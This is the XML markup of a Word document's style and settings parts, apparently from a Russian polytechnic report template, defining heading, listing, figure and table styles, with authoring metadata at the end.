    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E94DB1"/>
    <w:rsid w:val="00EA7175"/>
    <w:rsid w:val="00EA76EB"/>
    <w:rsid w:val="00EB3B2A"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00ED0A21"/>
    <w:rsid w:val="00ED59DE"/>
    <w:rsid w:val="00ED6100"/>
    <w:rsid w:val="00ED789F"/>
    <w:rsid w:val="00EE74C7"/>
    <w:rsid w:val="00EF260B"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F03DF5"/>
    <w:rsid w:val="00F07E69"/>
    <w:rsid w:val="00F132AC"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F6258E"/>
    <w:rsid w:val="00F6461A"/>
    <w:rsid w:val="00F66304"/>
    <w:rsid w:val="00F66A4D"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F76DCB"/>
    <w:rsid w:val="00F90E98"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA3E09"/>
    <w:rsid w:val="00FA50E7"/>
    <w:rsid w:val="00FB2261"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5904"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FB672A"/>
    <w:rsid w:val="00FC3743"/>
    <w:rsid w:val="00FC6AF6"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FD4F81"/>
    <w:rsid w:val="00FD561F"/>
    <w:rsid w:val="00FD6EC4"/>
    <w:rsid w:val="00FD7601"/>
    <w:rsid w:val="00FE0064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80CE6"/>
  <w15:docId w15:val="{B35120C9-2E5A-4C07-8DEE-F2A512E6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c">
    <w:name w:val="Normal"/>
    <w:aliases w:val="ОТЧЕТ_Текст_141"/>
    <w:qFormat/>
    <w:rsid w:val="002F3385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aliases w:val="ОТЧЕТ_Заголовок_1_уровень"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144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kern w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="ОТЧЕТ_Заголовок_уровень_2"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:link w:val="22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aliases w:val="ОТЧЕТ_Заголовок_3_уровень"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac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aliases w:val="ОТЧЕТ_Заголовок_4_уровнь"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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next w:val="ac"/>
    <w:link w:val="af1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10">
    <w:name w:val="ОТЧЁТ_Заголовок_1"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="240"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="ОТЧЁТ_Заголовок_2"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="240"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="af0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2">
    <w:name w:val="ОТЧЁТ_Заголовок_без_номера"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="ОТЧЁТ_Заголовок_приложение"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:aliases w:val="ОТЧЕТ_Заголовок_1_уровень Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="004B022A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2">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:aliases w:val="ОТЧЕТ_Заголовок_уровень_2 Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="20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aliases w:val="ОТЧЕТ_Заголовок_3_уровень Знак"/>
    <w:basedOn w:val="ad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aliases w:val="ОТЧЕТ_Заголовок_4_уровнь Знак"/>
    <w:basedOn w:val="ad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d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d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d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d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d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">
    <w:name w:val="НИР нумерованный список"/>
    <w:basedOn w:val="ac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c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3">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="ad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c"/>
    <w:next w:val="ac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3">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac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c"/>
    <w:next w:val="ac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4">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="ad"/>
    <w:uiPriority w:val="33"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="ad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e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c"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="List Paragraph"/>
    <w:aliases w:val="ОТЧЕТ_Абзац_Список"/>
    <w:basedOn w:val="ac"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af9">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="ae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a">
    <w:name w:val="ОТЧЁТ_Листинг"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00F90E98"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afb">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="afc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3">
    <w:name w:val="ОТЧЁТ_Листинг_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="afa"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afc">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="afb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7">
    <w:name w:val="ОТЧЁТ_Листинг_приложение_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="afa"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afd">
    <w:name w:val="ОТЧЁТ_Рисунок"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="ОТЧЁТ_Рисунок_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afe">
    <w:name w:val="ОТЧЁТ_Рисунок_приложение"/>
    <w:basedOn w:val="afd"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aa">
    <w:name w:val="ОТЧЕТ_Список_источников"/>
    <w:basedOn w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="header"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="aff0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d"/>
    <w:link w:val="aff"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff1">
    <w:name w:val="footer"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="aff2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d"/>
    <w:link w:val="aff1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="ac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5">
    <w:name w:val="ОТЧЁТ_Рисунок_приложение_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ab">
    <w:name w:val="ОТЧЁТ_Список_маркированный"/>
    <w:basedOn w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="ОТЧЁТ_Список_нумерованный[]"/>
    <w:basedOn w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff4">
    <w:name w:val="caption"/>
    <w:aliases w:val="Вставленный объект"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:link w:val="aff5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6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="Название объекта Знак"/>
    <w:aliases w:val="Вставленный объект Знак"/>
    <w:link w:val="aff4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d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8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7">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="ac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9">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="ad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a">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="affb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b">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="affa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numbering" w:customStyle="1" w:styleId="a8">
    <w:name w:val="ОТЧЁТ_список_основной"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="ad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c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c">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:aliases w:val="Интервал 0 pt11"/>
    <w:basedOn w:val="affa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d">
    <w:name w:val="TOC Heading"/>
    <w:aliases w:val="ОТЧЕТ_Заголовок_Содержания"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="ac"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="006E22C2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numbering" w:customStyle="1" w:styleId="a9">
    <w:name w:val="ОТЧЁТ_Список_приложение"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="affe">
    <w:name w:val="ОТЧЁТ_Таблица"/>
    <w:basedOn w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAns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="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:trPr>
        <w:tblHeader/>
      </w:trPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff">
    <w:name w:val="ОТЧЕТ_Таблица_Лево"/>
    <w:basedOn w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a2">
    <w:name w:val="ОТЧЁТ_Таблица_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a6">
    <w:name w:val="ОТЧЁТ_Таблица_приложение_подпись"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff0">
    <w:name w:val="ОТЧЕТ_Таблица_Центр"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="afff1"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff1">
    <w:name w:val="ОТЧЕТ_Таблица_Центр Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="afff0"/>
    <w:rsid w:val="00CD2144"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="140">
    <w:name w:val="ОТЧЁТ_Текст_14"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="141"/>
    <w:qFormat/>
    <w:rsid w:val="00CD2144"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:ind w:firstLine="709"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="141">
    <w:name w:val="ОТЧЁТ_Текст_14 Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="140"/>
    <w:rsid w:val="00CD2144"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afff2">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00DA0D09"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="ac"/>
    <w:rsid w:val="00AD107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d"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00AD10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9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\Desktop\polytech\&#1089;&#1077;&#1084;&#1077;&#1089;&#1090;&#1088;%201\AiP\&#1040;&#1080;&#1055;%20&#1064;&#1040;&#1041;&#1051;&#1054;&#105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43B60-5482-4C4F-9398-4855E53CE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АиП ШАБЛОН.dotx</Template>
  <TotalTime>1699</TotalTime>
  <Pages>15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Абдульманов</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>taylor john</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-26T11:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-03T11:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>